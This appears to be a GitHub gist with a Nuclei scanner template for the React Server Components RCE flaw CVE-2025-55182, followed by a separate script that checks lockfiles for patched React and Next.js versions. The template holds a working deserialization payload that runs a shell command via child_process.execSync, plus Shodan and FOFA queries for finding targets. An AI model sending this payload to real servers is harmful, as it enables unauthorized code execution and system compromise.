Created December 9, 2025 06:03
Gist: spynika/20969263b0c40e1ac04287f74fa247fa
```yaml
id: CVE-2025-55182

info:
  name: React Server Components - Remote Code Execution (React2Shell)
  author: assetnote,slcyber
  severity: critical
  description: |
    React Server Components (RSC) in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 contain an insecure deserialization
    vulnerability in the Flight protocol. An unauthenticated remote attacker can exploit this by sending a specially crafted
    multipart payload to execute arbitrary JavaScript code on the server. This affects Next.js applications using the App
    Router with Server Actions, as well as other frameworks implementing RSC (React Router, Waku, RedwoodJS, etc.).
  impact: |
    Successful exploitation allows unauthenticated remote code execution on the server, potentially leading to complete
    system compromise, data exfiltration, and lateral movement within the network.
  remediation: |
    Upgrade to patched versions immediately:
    - React: 19.0.1, 19.1.2, or 19.2.1
    - Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, or 16.0.7
  reference:
    - https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182
    - https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
    - https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce
    - https://www.akamai.com/blog/security-research/cve-2025-55182-react-nextjs-server-functions-deserialization-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-55182
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: "X-Powered-By: Next.js"
    fofa-query: 'header="X-Powered-By: Next.js"'
    product: react
    vendor: facebook
  tags: cve,cve2025,react,nextjs,rce,deserialization,critical,kev

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Next-Action: x
        X-Nextjs-Request-Id: b5dce965
        X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="0"

        {"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: NEXT_REDIRECT;push;/login?a=${res};307;});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="1"

        "$@0"
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="2"

        []
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - 'X-Action-Redirect:.*\/login\?a=11111'

      - type: status
        status:
          - 200
          - 303
          - 307

    extractors:
      - type: kval
        kval:
          - x_action_redirect
```
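The template's `remediation` block lists the patched React and Next.js releases but gives no way to check an application against them. The following is an added defender-side example, not part of the gist and not written by its author: it classifies the resolved versions in a `package-lock.json` (lockfile version 2 or 3, where installed packages live under `packages["node_modules/<name>"].version`) against the patched releases quoted above. Release lines the template does not list (for example React 18.x or Next.js 14.x) are reported as `unknown` rather than guessed; the sample lockfile at the bottom is constructed for this example, and the `react`/`next` package names are the standard npm names.

```javascript
'use strict';

// Added example, not part of the gist's nuclei template.
// Patched releases exactly as listed under `remediation` in the template.
const PATCHED_VERSIONS = {
  react: ['19.0.1', '19.1.2', '19.2.1'],
  next: ['15.0.5', '15.1.9', '15.2.6', '15.3.6', '15.4.8', '15.5.7', '16.0.7'],
};

// Parse "19.1.1", "v19.1.1" or a caret/tilde range such as "^19.1.0" into
// [major, minor, patch]. A range only yields its lower bound, so prefer the
// resolved versions in package-lock.json (or `npm ls`) over package.json ranges.
function parseVersion(spec) {
  const m = /^[\s^~>=]*v?(\d+)\.(\d+)\.(\d+)/.exec(String(spec));
  return m ? m.slice(1, 4).map(Number) : null;
}

// Classify one package version:
//   'vulnerable'  - on a release line the template covers, but below its patched version
//   'patched'     - at or above the patched version on that release line
//   'unknown'     - release line not covered by the template's remediation list
//   'unparseable' - not a semver-looking string (e.g. a dist-tag such as "latest")
function classify(pkg, spec) {
  const v = parseVersion(spec);
  if (!v) return 'unparseable';
  for (const fixed of PATCHED_VERSIONS[pkg] || []) {
    const f = parseVersion(fixed);
    if (f[0] === v[0] && f[1] === v[1]) {
      return v[2] >= f[2] ? 'patched' : 'vulnerable';
    }
  }
  return 'unknown';
}

// Audit a parsed package-lock.json (lockfileVersion 2 or 3): installed
// versions are recorded under packages["node_modules/<name>"].version.
function auditLockfile(lock) {
  const pkgs = (lock && lock.packages) || {};
  const result = {};
  for (const name of Object.keys(PATCHED_VERSIONS)) {
    const entry = pkgs[`node_modules/${name}`];
    result[name] = entry ? classify(name, entry.version) : 'not-installed';
  }
  return result;
}

// Weaker check from a parsed package.json: ranges only give a lower bound,
// so a 'patched' verdict here still needs confirming against the lockfile.
function auditPackageJson(pkgJson) {
  const deps = Object.assign({}, pkgJson.dependencies, pkgJson.devDependencies);
  const result = {};
  for (const name of Object.keys(PATCHED_VERSIONS)) {
    result[name] = name in deps ? classify(name, deps[name]) : 'not-installed';
  }
  return result;
}

// Constructed sample lockfile: React on an affected release (19.1.1 is in the
// template's affected list), Next.js already on a patched release.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '0.0.1' },
    'node_modules/react': { version: '19.1.1' },
    'node_modules/react-dom': { version: '19.1.1' },
    'node_modules/next': { version: '15.5.7' },
  },
};

// Example run on the constructed sample; for a real project pass
// JSON.parse(fs.readFileSync('package-lock.json', 'utf8')) instead.
for (const [name, verdict] of Object.entries(auditLockfile(SAMPLE_LOCK))) {
  console.log(`${name}: ${verdict}`);
}
```

Run it over a real lockfile by replacing `SAMPLE_LOCK` with the parsed file; a `vulnerable` verdict for `react` or `next` means the installed release is below the patched version on its line and the upgrade in the template's `remediation` block applies. Note that `react-dom` and the RSC packages are versioned in lockstep with `react`, so upgrading `react` alone without its siblings leaves a mismatched install.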